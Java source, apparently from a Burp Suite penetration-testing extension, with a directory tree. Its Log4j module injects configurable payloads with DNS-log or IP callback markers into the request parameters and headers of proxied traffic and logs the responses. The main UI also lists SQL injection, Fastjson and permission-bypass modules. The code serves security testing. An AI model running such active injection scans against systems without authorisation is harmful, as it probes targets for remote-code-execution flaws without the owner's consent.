private static boolean isCheckParam; // 是否检测参数
private static boolean isDnsOrIp; // 是否是dns或者ip
private static boolean isCheckWhiteList; // 是否检测白名单
private static Set<String> log4jPayload = new LinkedHashSet<>(); // 存储log4j payload
private static List<String> payloadList = new ArrayList<>(); // payload列表
private static List<String> domainList = new ArrayList<>(); // 白名单域名
private static List<String> headerList = new ArrayList<>(); // header列表
public static String dns;
public static String ip;
private static final Lock lock = new ReentrantLock();
public static void resetAllCaches() {
urlHashList.clear();
parameterList.clear();
UrlCacheUtil.resetCache("log4j");
}
@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse iHttpRequestResponse) {
if (isPassiveScan && toolFlag == IBurpExtenderCallbacks.TOOL_PROXY && !messageIsRequest) {
synchronized (log4jlog) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
Check(new IHttpRequestResponse[]{iHttpRequestResponse},false);
}
});
thread.start();
}
}
}
@Override
public IHttpService getHttpService() {
return currentlyDisplayedItem.getHttpService();
}
@Override
public byte[] getRequest() {
return currentlyDisplayedItem.getRequest();
}
@Override
public byte[] getResponse() {
return currentlyDisplayedItem.getResponse();
}
@Override
public void init() {
// 存储白名单域名
List<Log4jBean> domain = getLog4jListsByType("domain");
// 将domain转为List<String>
for (Log4jBean log4jBean : domain) {
domainList.add(log4jBean.getValue());
}
dns = getConfig("config", "dnslog").getValue();
ip = getConfig("config", "ip").getValue();
setupUI();
setupData();
}
// 初始化数据
private void setupData() {
// 被动扫描选择框
passiveScanCheckBox.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (passiveScanCheckBox.isSelected()) {
isPassiveScan = true;
} else {
isPassiveScan = false;
}
}
});
// 原始payload值选择框
originalValueCheckBox.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (originalValueCheckBox.isSelected()) {
isOriginalValue = true;
} else {
isOriginalValue = false;
}
}
});
// 检测header选择框
checkHeaderCheckBox.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (checkHeaderCheckBox.isSelected()) {
isCheckHeader = true;
} else {
isCheckHeader = false;
}
}
});
// 检测参数选择框
checkParmamCheckBox.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (checkParmamCheckBox.isSelected()) {
isCheckParam = true;
} else {
isCheckParam = false;
}
}
});
// 是否是dns或者ip选择框
isDnsOrIpCheckBox.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
dns = getConfig("config", "dnslog").getValue();
ip = getConfig("config", "ip").getValue();
if (isDnsOrIpCheckBox.isSelected()) {
isDnsOrIp = true;
isDnsOrIpCheckBox.setText("DNS");
} else {
isDnsOrIp = false;
isDnsOrIpCheckBox.setText("IP");
}
}
});
// 初始化白名单输入框
List<Log4jBean> domain = getLog4jListsByType("domain");
for (Log4jBean log4jBean : domain) {
whiteListTextArea.setText(whiteListTextArea.getText() + log4jBean.getValue() + "\n");
domainList.add(log4jBean.getValue());
}
// 初始化header输入框
List<Log4jBean> header = getLog4jListsByType("header");
for (Log4jBean log4jBean : header) {
headerTextArea.setText(headerTextArea.getText() + log4jBean.getValue() + "\n");
headerList.add(log4jBean.getValue());
}
// 初始化payload输入框
List<Log4jBean> payload = getLog4jListsByType("payload");
for (Log4jBean log4jBean : payload) {
payloadTextArea.setText(payloadTextArea.getText() + log4jBean.getValue() + "\n");
payloadList.add(log4jBean.getValue());
}
// 检测白名单选择框
checkWhiteListCheckBox.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (checkWhiteListCheckBox.isSelected()) {
isCheckWhiteList = true;
} else {
isCheckWhiteList = false;
}
}
});
// 保存白名单域名按钮
saveWhiteListButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
String whiteListTextAreaText = whiteListTextArea.getText();
deleteLog4jByType("domain");
// 如果包含换行符,就分割成多个domain
if (whiteListTextAreaText.contains("\n")) {
String[] split = whiteListTextAreaText.split("\n");
for (String s : split) {
Log4jBean log4jBean = new Log4jBean("domain", s);
saveLog4j(log4jBean);
}
} else {
Log4jBean log4jBean = new Log4jBean("domain", whiteListTextAreaText);
saveLog4j(log4jBean);
}
// 存储白名单域名
List<Log4jBean> domain = getLog4jListsByType("domain");
// 将domain转为List<String>
for (Log4jBean log4jBean : domain) {
domainList.add(log4jBean.getValue());
}
whiteListTextArea.updateUI();
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.save_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
// 保存header按钮
saveHeaderListButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
String headerTextAreaText = headerTextArea.getText();
deleteLog4jByType("header");
String[] split = headerTextAreaText.split("\n");
for (String s : split) {
Log4jBean log4jBean = new Log4jBean("header", s);
saveLog4j(log4jBean);
}
List<Log4jBean> header = getLog4jListsByType("header");
for (Log4jBean log4jBean : header) {
headerList.add(log4jBean.getValue());
}
headerTextArea.updateUI();
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.save_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
// 保存payload按钮
savePayloadButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
String payloadTextAreaText = payloadTextArea.getText();
deleteLog4jByType("payload");
String[] split = payloadTextAreaText.split("\n");
for (String s : split) {
Log4jBean log4jBean = new Log4jBean("payload", s);
saveLog4j(log4jBean);
}
List<Log4jBean> payload = getLog4jListsByType("payload");
for (Log4jBean log4jBean : payload) {
payloadList.add(log4jBean.getValue());
}
payloadTextArea.updateUI();
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.save_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
// 刷新表格
refreshTableButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
log4jtable.updateUI();
}
});
// 清空表格
clearTableButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
log4jlog.clear();
HRequestTextEditor.setMessage(new byte[0], true);
HResponseTextEditor.setMessage(new byte[0], false);
urlHashList.clear();
UrlCacheUtil.resetCache("log4j"); // 清空URL缓存
log4jtable.updateUI();
}
});
}
// 初始化UI
private void setupUI() {
// 注册被动扫描监听器
Utils.callbacks.registerHttpListener(this);
panel = new JPanel();
panel.setLayout(new BorderLayout());
JPanel splitPane = new JPanel(new BorderLayout());
// 左边的面板
// 左边的上下按7:3分割
JSplitPane leftSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
leftSplitPane.setResizeWeight(0.7);
leftSplitPane.setDividerLocation(0.7);
// 左边的上面是表格
urltablescrollpane = new JScrollPane();
log4jtable = new URLTable(new Log4jModel());
urltablescrollpane.setViewportView(log4jtable);
leftSplitPane.setTopComponent(urltablescrollpane);
// 左边的下面是消息编辑器
tabbedPanereq = new JTabbedPane();
tabbedPaneresp = new JTabbedPane();
HRequestTextEditor = Utils.callbacks.createMessageEditor(this, false);
HResponseTextEditor = Utils.callbacks.createMessageEditor(this, false);
tabbedPanereq.addTab("Request", HRequestTextEditor.getComponent());
tabbedPaneresp.addTab("Response", HResponseTextEditor.getComponent());
JSplitPane leftDownSplitPane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
leftDownSplitPane.setResizeWeight(0.5);
leftDownSplitPane.setDividerLocation(0.5);
leftDownSplitPane.setLeftComponent(tabbedPanereq);
leftDownSplitPane.setRightComponent(tabbedPaneresp);
leftSplitPane.setBottomComponent(leftDownSplitPane);
// 右边的面板
// 右边的上下按7:3分割
JSplitPane rightSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
rightSplitPane.setResizeWeight(0.7);
rightSplitPane.setDividerLocation(0.7);
// 右边的上部分 - 重新设计布局
// 添加被动扫描选择框
passiveScanCheckBox = new JCheckBox(I18nUtils.get("log4j.checkbox.passive"));
// 添加删除原始值选择框
originalValueCheckBox = new JCheckBox(I18nUtils.get("log4j.checkbox.original"));
// 添加检测cookie选择框
checkParmamCheckBox = new JCheckBox(I18nUtils.get("log4j.checkbox.params"));
// 添加检测header选择框
checkHeaderCheckBox = new JCheckBox(I18nUtils.get("log4j.checkbox.headers"));
// 添加白名单域名检测选择框
checkWhiteListCheckBox = new JCheckBox(I18nUtils.get("log4j.checkbox.whitelist"));
isDnsOrIpCheckBox = new JCheckBox(I18nUtils.get("log4j.checkbox.dns_ip"));
// 白名单域名保存按钮
saveWhiteListButton = new JButton(I18nUtils.get("log4j.button.save_whitelist"));
// 保存header按钮
saveHeaderListButton = new JButton(I18nUtils.get("log4j.button.save_header"));
// 白名单域名输入框列表
whiteListTextArea = new JTextArea(5,10);
whiteListTextArea.setLineWrap(false); // 自动换行
whiteListTextArea.setWrapStyleWord(false); // 按单词换行
JScrollPane whiteListTextAreascrollPane = new JScrollPane(whiteListTextArea);
// header检测数据框列表
headerTextArea = new JTextArea(5,10);
headerTextArea.setLineWrap(false); // 自动换行
headerTextArea.setWrapStyleWord(false); // 按单词换行
JScrollPane headerTextAreascrollPane = new JScrollPane(headerTextArea);
// 刷新表格按钮
refreshTableButton = new JButton(I18nUtils.get("log4j.button.refresh"));
// 清空表格按钮
clearTableButton = new JButton(I18nUtils.get("log4j.button.clear"));
// 白名单域名label
JLabel whiteDomainListLabel = new JLabel(I18nUtils.get("log4j.label.whitelist"));
// 检测header label
JLabel headerLabel = new JLabel(I18nUtils.get("log4j.label.header"));
// 添加到右边的上部分 - 重新设计布局
JPanel rightTopPanel = new JPanel();
rightTopPanel.setLayout(new BorderLayout());
rightTopPanel.setBorder(BorderFactory.createEmptyBorder(5, 5, 5, 5));
// 创建扫描选项面板
JPanel scanOptionsPanel = new JPanel();
scanOptionsPanel.setLayout(new GridLayout(2, 3, 5, 5));
scanOptionsPanel.setBorder(BorderFactory.createTitledBorder(I18nUtils.get("log4j.border.scan_options")));
scanOptionsPanel.add(passiveScanCheckBox);
scanOptionsPanel.add(originalValueCheckBox);
scanOptionsPanel.add(checkParmamCheckBox);
scanOptionsPanel.add(checkHeaderCheckBox);
scanOptionsPanel.add(checkWhiteListCheckBox);
scanOptionsPanel.add(isDnsOrIpCheckBox);
// 创建配置面板
JPanel configPanel = new JPanel();
configPanel.setLayout(new BorderLayout(5, 5));
configPanel.setBorder(BorderFactory.createTitledBorder(I18nUtils.get("log4j.border.configuration")));
// 白名单域名配置
JPanel whitelistPanel = new JPanel(new BorderLayout(5, 5));
whitelistPanel.add(whiteDomainListLabel, BorderLayout.NORTH);
whitelistPanel.add(whiteListTextAreascrollPane, BorderLayout.CENTER);
JPanel whitelistButtonPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));
whitelistButtonPanel.add(saveWhiteListButton);
whitelistPanel.add(whitelistButtonPanel, BorderLayout.SOUTH);
// Header检测配置
JPanel headerPanel = new JPanel(new BorderLayout(5, 5));
headerPanel.add(headerLabel, BorderLayout.NORTH);
headerPanel.add(headerTextAreascrollPane, BorderLayout.CENTER);
JPanel headerButtonPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));
headerButtonPanel.add(saveHeaderListButton);
headerPanel.add(headerButtonPanel, BorderLayout.SOUTH);
// 将白名单和Header配置放入分割面板
JSplitPane configSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
configSplitPane.setResizeWeight(0.5);
configSplitPane.setDividerLocation(0.5);
configSplitPane.setTopComponent(whitelistPanel);
configSplitPane.setBottomComponent(headerPanel);
configPanel.add(configSplitPane, BorderLayout.CENTER);
// 创建操作按钮面板
JPanel actionButtonsPanel = new JPanel(new FlowLayout(FlowLayout.LEFT, 5, 5));
actionButtonsPanel.setBorder(BorderFactory.createTitledBorder(I18nUtils.get("log4j.border.actions")));
actionButtonsPanel.add(refreshTableButton);
actionButtonsPanel.add(clearTableButton);
// 将所有面板放入主面板
JSplitPane mainRightSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
mainRightSplitPane.setResizeWeight(0.3);
mainRightSplitPane.setDividerLocation(0.3);
mainRightSplitPane.setTopComponent(scanOptionsPanel);
JPanel configAndActionsPanel = new JPanel(new BorderLayout(5, 5));
configAndActionsPanel.add(configPanel, BorderLayout.CENTER);
configAndActionsPanel.add(actionButtonsPanel, BorderLayout.SOUTH);
mainRightSplitPane.setBottomComponent(configAndActionsPanel);
rightTopPanel.add(mainRightSplitPane, BorderLayout.CENTER);
rightSplitPane.setTopComponent(rightTopPanel);
// 右边的下部分左边
// log4j payload label
JLabel PayloadLabel = new JLabel(I18nUtils.get("log4j.label.payload"));
// log4j payload输入框
// log4j payload保存按钮
payloadTextArea = new JTextArea(5,10);
payloadTextArea.setLineWrap(false); // 自动换行
payloadTextArea.setWrapStyleWord(false); // 按单词换行
JScrollPane payloadTextAreascrollPane = new JScrollPane(payloadTextArea);
savePayloadButton = new JButton(I18nUtils.get("log4j.button.save_payload"));
JPanel rightDownLeftPanel = new JPanel();
rightDownLeftPanel.setLayout(new BorderLayout(5, 5));
rightDownLeftPanel.setBorder(BorderFactory.createEmptyBorder(5, 5, 5, 5));
rightDownLeftPanel.add(PayloadLabel, BorderLayout.NORTH);
rightDownLeftPanel.add(payloadTextAreascrollPane, BorderLayout.CENTER);
JPanel payloadButtonPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));
payloadButtonPanel.add(savePayloadButton);
rightDownLeftPanel.add(payloadButtonPanel, BorderLayout.SOUTH);
// 左右分割面板添加rightDownLeftPanel和rightDownRightPanel
JPanel rightDownPanel = new JPanel(new BorderLayout());
rightDownPanel.add(rightDownLeftPanel, BorderLayout.CENTER);
rightSplitPane.setBottomComponent(rightDownPanel);
// 添加到splitPane
splitPane.add(leftSplitPane, BorderLayout.CENTER);
splitPane.add(rightSplitPane, BorderLayout.EAST);
panel.add(splitPane, BorderLayout.CENTER);
}
@Override
public JPanel getPanel(IBurpExtenderCallbacks callbacks) {
return panel;
}
@Override
public String getTabName() {
return "Log4jScan";
}
// 添加数据
public static void add(String extensionMethod, String url, String status, String res, IHttpRequestResponse baseRequestResponse) {
synchronized (log4jlog) {
int id = log4jlog.size();
log4jlog.add(new Log4jEntry(id, extensionMethod, url, status, res, baseRequestResponse));
log4jtable.updateUI();
}
}
// 获取请求包的tag
private static String getReqTag(IHttpRequestResponse baseRequestResponse, IRequestInfo req, String type) {
// 获取并处理URI
String uri = req.getHeaders().get(0).split(" ")[1].split("\\?")[0].replace("/", ".");
// 如果URI超过25个字符,截取并处理结尾的点号
if (uri.length() > 25) {
uri = uri.substring(0, 25);
if (uri.endsWith(".")) {
uri = uri.substring(0, uri.length() - 1);
}
}
// 处理URI末尾的点号
if (uri.endsWith(".")) {
uri = uri.substring(0, uri.length() - 1);
}
// 构建最终标签
String tag = req.getMethod() + "." + baseRequestResponse.getHttpService().getHost() + uri;
return "dns".equalsIgnoreCase(type) ? tag + "." : tag;
}
// 检测核心方法
public static void Check(IHttpRequestResponse[] messageInfo, boolean isSend) {
lock.lock();
try{
IHttpRequestResponse baseRequestResponse = messageInfo[0];
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
List<String> reqheaders = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
String method = analyzeRequest.getMethod();
String host = baseRequestResponse.getHttpService().getHost();
URL rdurlURL = analyzeRequest.getUrl();
String url = analyzeRequest.getUrl().toString();
List<IParameter> paraLists = analyzeRequest.getParameters();
// 如果method不是get或者post方式直接返回
if (!method.equals("GET") && !method.equals("POST")) {
return;
}
// url 中匹配为静态资源
if (Utils.isUrlBlackListSuffix(url)){
return;
}
// 如果没有开启检测参数和检测header 并且参数没有值 直接返回
if (!isCheckParam && !isCheckHeader) {
return;
}
// 判断参数类型,不符合的直接跳过检测
boolean ruleHit = true; // 默认设置为true,表示命中规则
for (IParameter para : paraLists) {
if ((para.getType() == PARAM_URL || para.getType() == PARAM_BODY || para.getType() == PARAM_JSON)
|| isCheckHeader) {
ruleHit = false; // 如果有 URL、BODY、JSON 参数或者开启了header 检测,则不命中规则
break;
}
}
if (ruleHit) {
return; // 如果命中规则,则直接返回
}
// 如果不是手动发送则需要进行url去重
if (!isSend) {
if (!UrlCacheUtil.checkUrlUnique("log4j", method, rdurlURL, paraLists)) {
return;
}
}else {
isCheckWhiteList = false;
}
if (isCheckWhiteList) {
// 如果未匹配到 直接返回
if (!Utils.isMatchDomainName(host,domainList)){
return;
}
}
// 加入payload前先清空列表
log4jPayload.clear();
// 将数据库中的payload加入到列表
for (String log4j : payloadList) {
if (isOriginalValue) {
log4jPayload.add(log4j);
} else {
if (log4j.contains("dnslog-url")) {
if (isDnsOrIp) {
String logPrefix = getReqTag(baseRequestResponse, analyzeRequest, "dns");
// 新增:为log4j dnslog payload加前缀
String log4jDnslogPayload = logPrefix + "log4j." + dns;
log4jPayload.add(log4j.replace("dnslog-url", log4jDnslogPayload));
} else {
String logPrefix = getReqTag(baseRequestResponse, analyzeRequest, "ip");
// 新增:为log4j ip payload加前缀
String log4jIpPayload = ip + "/log4j." + logPrefix;
log4jPayload.add(log4j.replace("dnslog-url", log4jIpPayload));
}
} else {
log4jPayload.add(log4j);
}
}
}
// 检测参数
if (isCheckParam) {
for (IParameter para : paraLists) {
if (para.getType() == PARAM_URL || para.getType() == PARAM_BODY || para.getType() == PARAM_JSON) {
String paraName = para.getName();
String paraValue = para.getValue();
// 判断参数是否在url中
if (para.getType() == PARAM_URL || para.getType() == PARAM_BODY) {
for (String logPayload : log4jPayload) {
// 如果是在get请求中,需要对payload进行url编码
if (para.getType() == PARAM_URL) {
logPayload = Utils.UrlEncode(logPayload);
}
IParameter iParameter = Utils.helpers.buildParameter(paraName, logPayload, para.getType());
byte[] bytes = Utils.helpers.updateParameter(baseRequestResponse.getRequest(), iParameter);
IHttpRequestResponse newRequestResponse = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), bytes);
IResponseInfo analyzeResponse = Utils.helpers.analyzeResponse(newRequestResponse.getResponse());
byte[] log4jresponseBody = newRequestResponse.getResponse();
String ParamLength = "";
String ParamstatusCode = String.valueOf(analyzeResponse.getStatusCode());
if (log4jresponseBody != null) {
// 判断有无Content-Length字段
IResponseInfo ReqResponse = Utils.helpers.analyzeResponse(log4jresponseBody);
List<String> log4jHeaders = ReqResponse.getHeaders();
String contentLength = HelperPlus.getHeaderValueOf(log4jHeaders, "Content-Length");
if (contentLength != null){
ParamLength = contentLength;
}
}
if (ParamLength.isEmpty()) {
assert log4jresponseBody != null;
ParamLength = String.valueOf(log4jresponseBody.length);
}
add(method, url, ParamstatusCode, ParamLength, newRequestResponse);
}
}
// 判断参数是否在json中
if (para.getType() == PARAM_JSON) {
for (String logPayload : log4jPayload) {
String request_data = Utils.helpers.bytesToString(baseRequestResponse.getRequest()).split("\r\n\r\n")[1];
Map<String, Object> request_json = JSON.parseObject(request_data);
List<Object> objectList = JsonUtils.updateJsonObjectFromStr(request_json, Utils.ReplaceChar(logPayload), 0);
String json = "";
for (Object o : objectList) {
json = JSON.toJSONString(o);
}
byte[] bytes = Utils.helpers.buildHttpMessage(reqheaders, json.getBytes());
IHttpRequestResponse newRequestResponse = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), bytes);
IResponseInfo analyzeResponse = Utils.helpers.analyzeResponse(newRequestResponse.getResponse());
byte[] log4jresponseBody = newRequestResponse.getResponse();
String ParamLength = "";
String ParamstatusCode = String.valueOf(analyzeResponse.getStatusCode());
if (log4jresponseBody != null) {
// 判断有无Content-Length字段
IResponseInfo ReqResponse = Utils.helpers.analyzeResponse(log4jresponseBody);
List<String> log4jHeaders = ReqResponse.getHeaders();
String contentLength = HelperPlus.getHeaderValueOf(log4jHeaders, "Content-Length");
if (contentLength != null){
ParamLength = contentLength;
}
}
if (ParamLength.isEmpty()) {
assert log4jresponseBody != null;
ParamLength = String.valueOf(log4jresponseBody.length);
}
add(method, url, ParamstatusCode, ParamLength, newRequestResponse);
}
break;
}
}
}
}
// 检测header
if (isCheckHeader) {
byte[] byte_Request = baseRequestResponse.getRequest();
int bodyOffset = analyzeRequest.getBodyOffset();
int len = byte_Request.length;
byte[] body = Arrays.copyOfRange(byte_Request, bodyOffset, len);
for (String logPayload : log4jPayload) {
List<String> reqheaders2 = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
List<String> newReqheaders = new ArrayList<>();
Iterator<String> iterator = reqheaders2.iterator();
while (iterator.hasNext()) {
String reqheader = iterator.next();
for (String header : headerList) {
if (reqheader.contains(header)) {
iterator.remove();
String newHeader = header + ": " + logPayload;
if (!newReqheaders.contains(newHeader)) {
newReqheaders.add(newHeader);
}
}
}
}
for (String header : headerList) {
String newHeader = header + ": " + logPayload;
// if (!reqheaders2.contains(header) && !newReqheaders.contains(newHeader)) {
// newReqheaders.add(newHeader);
// }
newReqheaders.add(newHeader);
}
reqheaders2.addAll(newReqheaders);
byte[] postMessage = Utils.helpers.buildHttpMessage(reqheaders2, body);
IHttpRequestResponse originalRequestResponse = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), postMessage);
byte[] responseBody = originalRequestResponse.getResponse();
String originallength = "";
String statusCode = "";
if (responseBody != null) {
IResponseInfo originalReqResponse = Utils.helpers.analyzeResponse(responseBody);
List<String> log4jHeaders = originalReqResponse.getHeaders();
statusCode = String.valueOf(originalReqResponse.getStatusCode());
String contentLength = HelperPlus.getHeaderValueOf(log4jHeaders, "Content-Length");
if (contentLength != null){
originallength = contentLength;
}
}
if (originallength.isEmpty()) {
assert responseBody != null;
originallength = String.valueOf(responseBody.length);
}
add(method, url, statusCode, originallength, originalRequestResponse);
}
}
}finally {
lock.unlock();
}
}
static class Log4jModel extends AbstractTableModel {
@Override
public int getRowCount() {
return log4jlog.size();
}
@Override
public int getColumnCount() {
return 5;
}
@Override
public String getColumnName(int column) {
switch (column) {
case 0:
return "#";
case 1:
return "Method";
case 2:
return "URL";
case 3:
return "Status";
case 4:
return "Length";
default:
return "";
}
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
Log4jEntry logEntry = log4jlog.get(rowIndex);
switch (columnIndex) {
case 0:
return logEntry.id;
case 1:
return logEntry.extensionMethod;
case 2:
return logEntry.url;
case 3:
return logEntry.res;
case 4:
return logEntry.length;
default:
return null;
}
}
@Override
public Class<?> getColumnClass(int column) {
if (column == 0) {
return Integer.class;
}
return super.getColumnClass(column);
}
}
public static class Log4jEntry {
final int id;
final String extensionMethod;
final String url;
final String length;
final String res;
final IHttpRequestResponse requestResponse;
public Log4jEntry(int id, String extensionMethod, String url, String res, String length, IHttpRequestResponse requestResponse) {
this.id = id;
this.extensionMethod = extensionMethod;
this.url = url;
this.length = length;
this.res = res;
this.requestResponse = requestResponse;
}
}
class URLTable extends JTable {
public URLTable(TableModel tableModel) {
super(tableModel);
setAutoCreateRowSorter(true);
TableColumnModel columnModel = getColumnModel();
columnModel.getColumn(0).setMaxWidth(50);
}
@Override
public void changeSelection(int rowIndex, int columnIndex, boolean toggle, boolean extend) {
// 如果表格已排序,需要将视图索引转换为模型索引
int modelRow = rowIndex;
if (getRowSorter() != null) {
modelRow = convertRowIndexToModel(rowIndex);
}
Log4jEntry logEntry = log4jlog.get(modelRow);
HRequestTextEditor.setMessage(logEntry.requestResponse.getRequest(), true);
if (logEntry.requestResponse.getResponse() == null) {
HResponseTextEditor.setMessage(new byte[0], false);
} else {
HResponseTextEditor.setMessage(logEntry.requestResponse.getResponse(), false);
}
currentlyDisplayedItem = logEntry.requestResponse;
super.changeSelection(rowIndex, columnIndex, toggle, extend);
}
}
}
================================================
FILE: src/main/java/burp/ui/MainUI.java
================================================
package burp.ui;
import burp.IBurpExtenderCallbacks;
import burp.ITab;
import burp.utils.Utils;
import javax.swing.*;
import java.awt.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
public class MainUI extends JPanel implements ITab {
private static JTabbedPane mainPanel;
IBurpExtenderCallbacks callbacks;
public static Map<String, Boolean> moduleStatus;
public MainUI(IBurpExtenderCallbacks callbacks) {
this.callbacks = callbacks;
try {
mainPanel = new JTabbedPane();
for (int i = 0; i < init().size(); i++) {
Class<?> clazz = Class.forName(init().get(i));
UIHandler uiHandler = (UIHandler) clazz.newInstance();
uiHandler.init();
mainPanel.add(uiHandler.getTabName(), uiHandler.getPanel(callbacks));
}
}catch (Exception e ){
Utils.stderr.println(e.getMessage());
}
}
public static List<String> init() {
List<String> uiList = new ArrayList<>();
uiList.add("burp.ui.AuthUI");
uiList.add("burp.ui.SqlUI");
uiList.add("burp.ui.PermUI");
uiList.add("burp.ui.FastjsonUI");
uiList.add("burp.ui.Log4jUI");
uiList.add("burp.ui.RouteUI");
uiList.add("burp.ui.SocksUI");
uiList.add("burp.ui.UrlRedirectUI");
uiList.add("burp.ui.SimilarUI");
uiList.add("burp.ui.ConfigUI");
return uiList;
}
@Override
public String getTabCaption() {
return Utils.NAME;
}
@Override
public Component getUiComponent() {
return mainPanel;
}
}
================================================
FILE: src/main/java/burp/ui/PermUI.java
================================================
package burp.ui;
import burp.*;
import burp.bean.PermBean;
import burp.ui.UIHepler.GridBagConstraintsHelper;
import burp.utils.I18nUtils;
import burp.utils.Utils;
import burp.utils.UrlCacheUtil;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import javax.swing.table.TableColumnModel;
import javax.swing.table.TableModel;
import java.awt.*;
import java.awt.datatransfer.Clipboard;
import java.awt.datatransfer.StringSelection;
import java.awt.event.ActionEvent;
import java.net.URL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;
import static burp.dao.PermDao.*;
/**
* @Author Xm17
* @Date 2024-06-22 9:11
*/
public class PermUI implements UIHandler, IMessageEditorController, IHttpListener {
private JPanel panel; // 主面板
private static JTable permTable; // perm表格
private IHttpRequestResponse currentlyDisplayedItem; // 当前显示的请求
private JTabbedPane tabbedPanereqresp; // 请求tab
private JPanel originPane; // 原始请求面板
private JPanel lowpermPane; // 低权限请求面板
private JPanel nopermPane; // 无权限请求面板
private JCheckBox passiveScanCheckBox; // 被动扫描选择框
private JCheckBox whiteDomainListCheckBox; // 白名单域名选择框
private JTextArea whiteDomainListTextArea; // 白名单域名输入框
private JButton saveWhiteDomainButton; // 保存白名单按钮
private JButton saveAuthDataButton; // 保存认证数据按钮
private JButton refreshButton; // 刷新按钮
private JButton clearButton; // 清空数据按钮
private JButton exportButton; // 导出按钮
private JTextArea lowPermAuthTextArea; // 低权限认证请求信息输入框
private JTextArea noPermAuthTextArea; // 无权限认证请求信息输入框
private IMessageEditor originarequest; // 原始请求
private IMessageEditor originaresponse; // 原始响应
private IMessageEditor lowpermrequest; // 低权限请求
private IMessageEditor lowpermresponse; // 低权限响应
private IMessageEditor nopermrequest; // 无权限请求
private IMessageEditor nopermresponse; // 无权限响应
private static final List<PermEntry> permlog = new ArrayList<>(); // permlog 用于存储请求
private static final List<String> parameterList = new ArrayList<>(); // 参数列表
private static final List<String> urlHashList = new ArrayList<>(); // url hash list
private static boolean ispassiveScan; // 是否被动扫描
private static boolean isWhiteDomainList; // 是否白名单
private static final Lock lock = new ReentrantLock();
public static void re
gitextract_wqm_s8bq/
├── .gitignore
├── .idea/
│ ├── .gitignore
│ ├── MarsCodeWorkspaceAppSettings.xml
│ ├── encodings.xml
│ ├── misc.xml
│ ├── runConfigurations.xml
│ ├── uiDesigner.xml
│ └── vcs.xml
├── README.md
├── pom.xml
└── src/
└── main/
├── java/
│ └── burp/
│ ├── BurpExtender.java
│ ├── bean/
│ │ ├── AuthBean.java
│ │ ├── ConfigBean.java
│ │ ├── FastjsonBean.java
│ │ ├── Log4jBean.java
│ │ ├── NucleiBean.java
│ │ ├── PermBean.java
│ │ ├── RouteBean.java
│ │ ├── SimilarDomainConfigBean.java
│ │ ├── SimilarDomainResultBean.java
│ │ ├── SimilarProjectBean.java
│ │ ├── SimilarUrlResultBean.java
│ │ └── SqlBean.java
│ ├── dao/
│ │ ├── ConfigDao.java
│ │ ├── FastjsonDao.java
│ │ ├── Log4jDao.java
│ │ ├── PermDao.java
│ │ ├── RouteDao.java
│ │ ├── SimilarDomainConfigDao.java
│ │ ├── SimilarDomainResultDao.java
│ │ ├── SimilarProjectDao.java
│ │ ├── SimilarUrlResultDao.java
│ │ └── SqlDao.java
│ ├── menu/
│ │ ├── AuthMenu.java
│ │ ├── FastjsonMenu.java
│ │ ├── Log4jMenu.java
│ │ ├── NucleiMenu.java
│ │ ├── PermMenu.java
│ │ ├── RouteMenu.java
│ │ ├── SqlMenu.java
│ │ └── TextProcessMenu.java
│ ├── ui/
│ │ ├── AuthUI.java
│ │ ├── ConfigUI.java
│ │ ├── FastjsonUI.java
│ │ ├── Log4jUI.java
│ │ ├── MainUI.java
│ │ ├── PermUI.java
│ │ ├── RouteUI.java
│ │ ├── SimilarHelper/
│ │ │ ├── CacheManager.java
│ │ │ ├── TableRenderer.java
│ │ │ ├── ThreadManager.java
│ │ │ ├── bean/
│ │ │ │ ├── Domain.java
│ │ │ │ ├── Project.java
│ │ │ │ └── URL.java
│ │ │ ├── dialog/
│ │ │ │ ├── DomainConfigDialog.java
│ │ │ │ └── ProjectManageDialog.java
│ │ │ ├── table/
│ │ │ │ ├── DomainTable.java
│ │ │ │ └── URLTable.java
│ │ │ └── tablemodel/
│ │ │ └── TableModel.java
│ │ ├── SimilarUI.java
│ │ ├── SocksUI.java
│ │ ├── SqlUI.java
│ │ ├── UIHandler.java
│ │ ├── UIHepler/
│ │ │ └── GridBagConstraintsHelper.java
│ │ └── UrlRedirectUI.java
